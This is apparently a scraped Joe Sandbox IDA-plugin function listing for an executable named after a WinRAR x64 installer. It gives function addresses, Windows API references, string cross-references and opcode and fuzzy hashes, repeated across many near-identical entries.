Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Alloc__vcrt___vcrt_uninitialize_ptd
String ID:
API String ID: 3765095794-0
Opcode ID: d597362c3116f6ab4b785273b15ee223b4072af199ab353e3b77f6cbd2219f8d
Instruction ID: 9aeb0b3884a3df487ca196d749d8d512113f58bae3a9acfed06ffab016111109
Opcode Fuzzy Hash: d597362c3116f6ab4b785273b15ee223b4072af199ab353e3b77f6cbd2219f8d
Instruction Fuzzy Hash: 39E01A60D0C61381EA24BF386CC787422946F7735AF502771D0EDEA2E2DF2CB406A790

Function 00007FF6C3BA6DC0 Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 00007FF6C3BA6DDA
SetWindowLongW.USER32 ref: 00007FF6C3BA6DEF

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 90d2bd7b62abbdc05d8c9075ab8c9923e8f44253ec73a575b76224aa5386238f
Instruction ID: 2c77932ce512caba7b9b3a45c4bd564a9a88a3ee6c5c8b249d5209ca30357977
Opcode Fuzzy Hash: 90d2bd7b62abbdc05d8c9075ab8c9923e8f44253ec73a575b76224aa5386238f
Instruction Fuzzy Hash: FCD02B44F0450142EF180F391805D3422400FEBB92F081230E9E69A3D1CE2D94998700

Function 00007FF6C3BB0C7C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF6C3BB0D9D

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 5134a0bba61ddd67747fce870432551b35958541116bffe9b840d32909437fba
Instruction ID: b35ec31536c48d7f19ab7dff2979ff65ad710520f8e9429e7885a3cc040c349b
Opcode Fuzzy Hash: 5134a0bba61ddd67747fce870432551b35958541116bffe9b840d32909437fba
Instruction Fuzzy Hash: 79413D26B14B5686EB10CF65D891BAC3770FB59B9AF004136DE8DAB7A5CF78E444C700

Function 00007FF6C3BB8754 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C3BB8800: GetModuleHandleW.KERNEL32(?,?,?,00007FF6C3BB876F,?,?,?,00007FF6C3BB8B2A), ref: 00007FF6C3BB8827

DloadProtectSection.DELAYIMP ref: 00007FF6C3BB87C5

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: DloadHandleModuleProtectSection
String ID:
API String ID: 2883838935-0
Opcode ID: 19c8764c24552fe191af6715fbc6115f12abb672a0229a97d1bcff063b1383d3
Instruction ID: 4865b993796ee1e0e704118afd1c23b1ee945a18c83230c1ad4388dda323766c
Opcode Fuzzy Hash: 19c8764c24552fe191af6715fbc6115f12abb672a0229a97d1bcff063b1383d3
Instruction Fuzzy Hash: DB11BA61D08B5386FA519F59AC83B742391AF3674FF040076C9CCFB2A6DE3CA585C685

Function 00007FF6C3BC9568 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6C3BC74BA,?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000), ref: 00007FF6C3BC95BD

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: dda0aeea4a4b350f4290d21fdd2aadf60cfc06c1fab5ec6fd6d9af870ea23c7c
Instruction ID: 0b6f8e2b0ec184d36bb102714cf26ec993fec18a4220d6d71bebddcd23fef732
Opcode Fuzzy Hash: dda0aeea4a4b350f4290d21fdd2aadf60cfc06c1fab5ec6fd6d9af870ea23c7c
Instruction Fuzzy Hash: EFF04F94B0930645FE686F627513AB526845FABB82F484431C9DFE62C2DE2CE4814610

Function 00007FF6C3BC7774 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF6C3BC8FA1,?,?,00000000,00007FF6C3BCB137,?,?,?,00007FF6C3BC6677,?,?,?,00007FF6C3BC656D), ref: 00007FF6C3BC77B2

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 069adf44af0af37f8dda52b3c24bc21013c2e39c29fa34685c2c2ee4b02486aa
Instruction ID: edae8e8d69e7beb859a29590396ad310a4e99608203deea75570ef50a5697553
Opcode Fuzzy Hash: 069adf44af0af37f8dda52b3c24bc21013c2e39c29fa34685c2c2ee4b02486aa
Instruction Fuzzy Hash: EAF0F815B1D20B49FE747E627943EB522845FA6BB2F584632D9EEE62C1DF2CE4804620

Function 00007FF6C3BA39B8 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

SHGetPathFromIDListW.SHELL32 ref: 00007FF6C3BA39E8

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: FromListPath
String ID:
API String ID: 3839826586-0
Opcode ID: 4ee4a53a9798eae0db382600d551ca3ae0aa6d7e4044a86bff0496983a3df156
Instruction ID: e69c1d07debfa2cb28b322d9a6cff678d787de0970767fa0d3683d8019100595
Opcode Fuzzy Hash: 4ee4a53a9798eae0db382600d551ca3ae0aa6d7e4044a86bff0496983a3df156
Instruction Fuzzy Hash: F5F0B41670C54152DA10AF11E9424BA6330EFFA7C0F844030E5EDD67AADD2CC9049700

Function 00007FF6C3BA0910 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,00007FF6C3BA0566,?,?,?,?,?,?,?,?,?,?,?,00007FF6C3B930C4), ref: 00007FF6C3BA0936

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 3b82a6023a20df79a4367766d46024c1a82b0f45e6a7cb7470ce24be78ea5211
Instruction ID: 480992cb9c0d7cdafb2de658491344f4943240f5cf7a889ca68564f9850ec247
Opcode Fuzzy Hash: 3b82a6023a20df79a4367766d46024c1a82b0f45e6a7cb7470ce24be78ea5211
Instruction Fuzzy Hash: D8F09C32A0CA4185FF248F35E046BB96660D725B79F595334D7FC451D5DF28D495C300

Function 00007FF6C3BB2724 Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStream.GDIPLUS ref: 00007FF6C3BB274D

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 446f61bfadfe570d130a4e3bd9fb0c0ec4c3e47e31c578352c1c198b84ceca1a
Instruction ID: c90d5c01a5d2d656780a8cffc39f32adee5c93545d360919022bcd9d8e15b8ff
Opcode Fuzzy Hash: 446f61bfadfe570d130a4e3bd9fb0c0ec4c3e47e31c578352c1c198b84ceca1a
Instruction Fuzzy Hash: 25E04FA5A24B4182DB04DF66E492BA96320FF6DB86F441135EECD9B349DF3CD5588700

Function 00007FF6C3BB0150 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

IsWindow.USER32 ref: 00007FF6C3BB0164

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 2323ccc5e59be8ee0254885ef1c083fa11a3be6e46f9bc61acf87414425a04a4
Instruction ID: 0600c2d2f21f4933872a79a66df6a064f36625cee0428d357ff16780b70292ab
Opcode Fuzzy Hash: 2323ccc5e59be8ee0254885ef1c083fa11a3be6e46f9bc61acf87414425a04a4
Instruction Fuzzy Hash: B7E0866270894181E7148F5AF88157923B0DB5CBD4F145030EB8DC7324DE38C8E18700

Function 00007FF6C3BC75E0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

__vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6C3BC760B

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: __vcrt_uninitialize_ptd
String ID:
API String ID: 1180542099-0
Opcode ID: f1178bfb67fd1e9b74311116ca1de370e57ed1851a15a2e9a1d2a64c8fc5a076
Instruction ID: 82cb0a5c0bf2f6df402bca81b722f25002aa341a4115bc267d8fadba362d50eb
Opcode Fuzzy Hash: f1178bfb67fd1e9b74311116ca1de370e57ed1851a15a2e9a1d2a64c8fc5a076
Instruction Fuzzy Hash: 96E0B660E192028DE974BF3874438B916505F77313E900975D4DEE22D29F2DA2026610

Function 00007FF6C3BB25C0 Relevance: 1.5, APIs: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF6C3BB25DE

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: BitmapCreateFromGdip
String ID:
API String ID: 4184683939-0
Opcode ID: 2835fb5b02d24504015d22796a8bb097095c226e53ff9630aea8b93b024342d5
Instruction ID: b406bb21bd105c431cd9511a19158021472eb15fe0fdbcd4cdcb28df624433bc
Opcode Fuzzy Hash: 2835fb5b02d24504015d22796a8bb097095c226e53ff9630aea8b93b024342d5
Instruction Fuzzy Hash: 3ED0A900F1860280EA589E63A49683852919BFFFC9F184030CDCEDF304CC2CD4814B80

Function 00007FF6C3BA5B14 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C3BA6458: GetModuleHandleW.KERNEL32(?,?,?,?,00007FF6C3BA5B30), ref: 00007FF6C3BA645E
Part of subcall function 00007FF6C3BA6458: FindResourceW.KERNEL32(?,?,?,?,00007FF6C3BA5B30), ref: 00007FF6C3BA6474

SetProcessDefaultLayout.USER32 ref: 00007FF6C3BA5B3E

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: DefaultFindHandleLayoutModuleProcessResource
String ID:
API String ID: 4238118935-0
Opcode ID: 1194b935c239007cd5f67d2b8d9508919f7200d3e35f640b0abc351187ced2ef
Instruction ID: 5746c124638bea300b80b6639351d54c2f00324ca3a171d3b13c911f88586b6d
Opcode Fuzzy Hash: 1194b935c239007cd5f67d2b8d9508919f7200d3e35f640b0abc351187ced2ef
Instruction Fuzzy Hash: 62D05E60E08D0380E914BF5998439F423206FB2707F800072D0CDA61D38D0DB659C751

Non-executed Functions

Function 00007FF6C3BCCFAC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMONLIBRARYCODE

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6C3BCCFFA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6C3BCD666
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6C3BCD7DC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6C3BCDA9A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6C3BCDCBA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6C3BCDEF7
memcpy_s.LIBCPMT ref: 00007FF6C3BCDFD2
memcpy_s.LIBCPMT ref: 00007FF6C3BCE07D
memcpy_s.LIBCPMT ref: 00007FF6C3BCE14C

Strings

1#INF, xrefs: 00007FF6C3BCD123
1#IND, xrefs: 00007FF6C3BCD0E7
1#QNAN, xrefs: 00007FF6C3BCD113
1#SNAN, xrefs: 00007FF6C3BCD10A

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 2876494d900644a29afb1a5b15b67c8b1059c41ea66019e88c1bee61bd3e3767
Instruction ID: 4bdb2723bc683731cc07c36229b73866c4f62e13309d537d349c72ceee421a04
Opcode Fuzzy Hash: 2876494d900644a29afb1a5b15b67c8b1059c41ea66019e88c1bee61bd3e3767
Instruction Fuzzy Hash: 87B2E776F182928BE7349F64E442BFD77A1FB6534AF405139DA8DA7A84DF38A500CB40

Function 00007FF6C3B9C4E0 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 412fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C3B9C424: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C3B9C3F3,?,?,?,00007FF6C3B9C2E2), ref: 00007FF6C3B9C447
Part of subcall function 00007FF6C3B9C424: GetLastError.KERNEL32 ref: 00007FF6C3B9C4A8
Part of subcall function 00007FF6C3B9C424: CloseHandle.KERNEL32 ref: 00007FF6C3B9C4BB

CreateFileW.KERNEL32 ref: 00007FF6C3B9C7A3

Part of subcall function 00007FF6C3BA160C: GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C3BA15DD,?,?,?,?,00007FF6C3B9BD80), ref: 00007FF6C3BA1630
Part of subcall function 00007FF6C3BA160C: GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C3BA15DD,?,?,?,?,00007FF6C3B9BD80), ref: 00007FF6C3BA1666

CloseHandle.KERNEL32 ref: 00007FF6C3B9C819
CreateFileW.KERNEL32 ref: 00007FF6C3B9C9CA

Part of subcall function 00007FF6C3BA1A2C: RemoveDirectoryW.KERNEL32 ref: 00007FF6C3BA1A50
Part of subcall function 00007FF6C3BA1A2C: RemoveDirectoryW.KERNEL32 ref: 00007FF6C3BA1A88

DeviceIoControl.KERNEL32 ref: 00007FF6C3B9CA3B
CloseHandle.KERNEL32 ref: 00007FF6C3B9CA48
GetLastError.KERNEL32 ref: 00007FF6C3B9CA5D
RemoveDirectoryW.KERNEL32 ref: 00007FF6C3B9CAA4
DeleteFileW.KERNEL32 ref: 00007FF6C3B9CAAF

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00007FF6C3B9C53D
SeRestorePrivilege, xrefs: 00007FF6C3B9C531
\??\, xrefs: 00007FF6C3B9C583
UNC\, xrefs: 00007FF6C3B9C607

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: File$CloseDirectoryHandleRemove$AttributesCreateErrorLast$ControlCurrentDeleteDeviceProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3322710514-3508440684
Opcode ID: 99c31330118c449dc1cef39c88eddea7408420ac2ea0aa74bcb10c8a1c6d5c59
Instruction ID: fee334c74d4fdf4237b9faaef0929e728d3b5879924eb4d237858c5df09fab90
Opcode Fuzzy Hash: 99c31330118c449dc1cef39c88eddea7408420ac2ea0aa74bcb10c8a1c6d5c59
Instruction Fuzzy Hash: 5702AF62A08A4255FB10EF60D456AFD6370EFB27A5F404132EADDE76DADE2CE509C700

Function 00007FF6C3BB34D0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 247windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32 ref: 00007FF6C3BB3581

Strings

REPLACEFILEDLG, xrefs: 00007FF6C3BB3509
%s %s, xrefs: 00007FF6C3BB375E, 00007FF6C3BB3894

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ItemMessageSend
String ID: %s %s$REPLACEFILEDLG
API String ID: 3015471070-439456425
Opcode ID: 865b78183c3d0e082317d143920b031cc7e35806cfd5b13474620c024b0bbc61
Instruction ID: b425ed16b7775f72b8c65f1e1dad19ec7aae55ed6c099be393118655e33190d1
Opcode Fuzzy Hash: 865b78183c3d0e082317d143920b031cc7e35806cfd5b13474620c024b0bbc61
Instruction Fuzzy Hash: EDB19425A08A8655EB24EF21D896BFD2360FFA6789F400135D5CDAF69ADF3CD609C340

Function 00007FF6C3BBA170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6C3BBA18C
RtlCaptureContext.KERNEL32 ref: 00007FF6C3BBA1B9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6C3BBA1D3
RtlVirtualUnwind.KERNEL32 ref: 00007FF6C3BBA214
IsDebuggerPresent.KERNEL32 ref: 00007FF6C3BBA268
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6C3BBA289
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6C3BBA294

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: eea4ae72b02310c68cbfcb40ebcbd3b76fa2b8c2e372b8786a5d16902a8ea07a
Instruction ID: b224ffd95ea0d8ea2b5322c39e2b83a4129e0946172f457abf1642cf40b96ae4
Opcode Fuzzy Hash: eea4ae72b02310c68cbfcb40ebcbd3b76fa2b8c2e372b8786a5d16902a8ea07a
